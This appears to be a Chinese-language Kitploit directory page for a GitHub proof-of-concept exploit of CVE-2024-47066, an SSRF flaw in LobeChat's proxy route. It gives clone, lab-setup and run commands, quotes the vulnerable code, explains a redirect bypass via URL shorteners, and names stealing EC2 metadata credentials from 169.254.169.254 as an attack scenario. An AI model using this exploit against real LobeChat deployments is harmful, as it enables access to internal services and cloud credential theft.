Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-47066 — 针对 CVE-2024-47066 的概念验证漏洞利用,这是 LobeChat 中的一个服务端请求伪造 (SSRF) 漏洞,可通过重定向绕过基于 IP 的限制以访问内部资源。 | Kitploit
工具/GitHubGitHub/l8bl/cve-2024-47066
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试云安全
GitHubl8bl/cve-2024-47066

CVE-2024-47066

针对 CVE-2024-47066 的概念验证漏洞利用,这是 LobeChat 中的一个服务端请求伪造 (SSRF) 漏洞,可通过重定向绕过基于 IP 的限制以访问内部资源。

查看仓库
41441年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-47066

★ CVE-2024-47066 LobeChat SSRF PoC ★

描述

CVE-2024-47066:Lobe Chat 是一个开源的人工智能聊天框架。在 1.19.13 版本之前,src/app/api/proxy/route.ts 中实现的服务器端请求伪造保护未考虑重定向,当攻击者提供外部的恶意 URL 重定向到内部资源(如私有网络或回环地址)时,可被绕过。1.19.13 版本包含了针对该问题的改进修复。

报告者:a1loy

https://github.com/user-attachments/assets/2c4a3be0-5732-48f5-a96c-d361fd914fec

使用方法

Git 克隆

root@kitploit:~
git clone https://github.com/l8BL/CVE-2024-47066.git
cd CVE-2024-47066

搭建漏洞环境

root@kitploit:~
cd docker
docker-compose up -d

(外部) LobeChat --> SSRF 攻击 --> (内部) http://www.internal-service:4000

安装依赖

root@kitploit:~
pip install -r requirements.txt

命令

root@kitploit:~
python3 CVE-2024-47066.py -v <URL_TO_EXPLOIT> -i <URL_TO_REQUEST>

示例

root@kitploit:~
python3 CVE-2024-47066.py -v http://localhost:3210 -i http://www.internal-service:4000

输出

CVE-2024-47066 alt text

结果

alt text

分析

漏洞点 (/app/api/proxy/route.ts)

root@kitploit:~
import { isPrivate } from 'ip';
import { NextResponse } from 'next/server';
import dns from 'node:dns';
import { promisify } from 'node:util';

const lookupAsync = promisify(dns.lookup);

export const runtime = 'nodejs';

/**
 * just for a proxy
 */
export const POST = async (req: Request) => {
  const url = new URL(await req.text());
  let address;

  try {
    const lookupResult = await lookupAsync(url.hostname);
    address = lookupResult.address;
  } catch (err) {
    console.error(`${url.hostname} DNS parser error:`, err);

    return NextResponse.json({ error: 'DNS parser error' }, { status: 504 });
  }

  const isInternalHost = isPrivate(address);

  if (isInternalHost)
    return NextResponse.json({ error: 'Not support internal host proxy' }, { status: 400 });

  const res = await fetch(url.toString());

  return new Response(res.body, { headers: res.headers });
};

在第26行下方,没有判断重定向响应的地方。因此,使用 URL 缩短器时,可以轻松绕过 isPrivate() 函数。

攻击场景

窃取 EC2 元数据凭证

向 http://169.254.169.254 发起请求

免责声明

本仓库并非针对 CVE-2024-47066 的 SSRF 利用工具。此项目的目的是帮助人们了解该漏洞,并可能测试他们自己的应用程序。

参考

https://github.com/advisories/GHSA-3fc8-2r3f-8wrg

下载工具